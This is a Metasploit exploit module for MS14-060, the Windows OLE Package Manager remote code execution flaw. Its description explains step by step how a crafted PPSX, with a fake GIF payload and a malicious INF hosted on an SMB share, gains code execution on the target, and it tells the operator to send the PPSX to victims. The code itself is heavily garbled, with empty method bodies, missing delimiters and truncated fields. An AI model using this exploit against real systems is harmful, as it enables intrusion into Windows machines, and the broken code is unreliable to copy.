class Metasploit3 < Msf::Exploit::Remote

  

  

  def initialize(info={})

      'Name'           => "MS14-060 Microsoft Windows OLE Package Manager Code Execution",

      'Description'    => %q{

        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)

        Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be

        running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such

        as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to

        a failure in the CPackage::CreateTempFileName function.

  

        This module will generate three files: an INF, a GIF, and a PPSX file. You are required to

        set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an

        older version of Winodws (such as XP) work best for this because they require little

        configuration to get going. The PPSX file is what you should send to your target.

  

        In detail, the vulnerability has to do with how the Object Packager 2 component

        (packager.dll) handles an INF file that contains malicious registry changes, which may be

        leveraged for code execution. First of all, Packager does not load the INF file directly.

        But as an attacker, you can trick it to load your INF anyway by embedding the file path as

        a remote share in an OLE object. The packager will then treat it as a type of media file,

        and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will

        download it with a CopyFileW call, save it in a temp folder, and pass that information for

        later. The exploit will do this loading process twice: first for a fake gif file that's

        actually the payload, and the second for the INF file.

  

        The packager will also look at each OLE object's XML Presentation Command, specifically the

        type and cmd property. In the exploit, "verb" media command type is used, and this triggers

        the packager!CPackage::DoVerb function. Also, "-3" is used as the fake gif file's cmd

        property, and "3" is used for the INF. When the cmd is "-3", DoVerb will bail. But when "3"

        is used (again, for the INF file), it will cause the packager to try to find appropriate

        handler for it, which will end up with C:\Windows\System32\infDefaultInstall.exe, and that

        will install/run the malicious INF file, and finally give us arbitrary code execution.

      'License'        => MSF_LICENSE,

      'Author'         =>

          'juan vazquez' # Metasploit module

      'References'     =>

          ['URL' , 'http://www.isightpartners.com/2014/10/cve-2014-4114/'],

      'Payload'        =>

          'Space'       => 2048,

          'DisableNops' => true

      'Platform'       => 'win',

      'Arch'           => ARCH_X86,

      'Targets'        =>

      'Privileged'     => false,

      'DisclosureDate' => "Oct 14 2014",

      'DefaultTarget'  => 0))

  

        OptString.new('UNCPATH', [ true, 'The UNC folder to use (Ex: \\\\192.168.1.1\\share)' ])

  

  def exploit

    @unc = validate_unc_path

  

    if @unc.nil?

  

  

  

  

  

  

  def validate_unc_path

    if datastore['UNCPATH'] =~ /^\\{2}[[:print:]]+\\[[:print:]]+\\*$/

  

  

  def my_file_create(data, name)

  

  

  def zip_ppsx(ole_exe, ole_inf)

  

    Dir["#{data_dir}/**/**"].each do |file|

      unless File.directory?(file)

  

  

  

    zip_data.each_pair do |k,v|

  

  

  def ole_inf(file_name)

  

  

  

  def ole_exe(file_name)

  

  

  

  

  def create_ole(stream_name, data)

  

  

    directory.each_entry do |entry|

      if entry.instance_variable_get(:@_ab) == 'Root Entry'

  

  

  

  

  def inf_file(gif_name)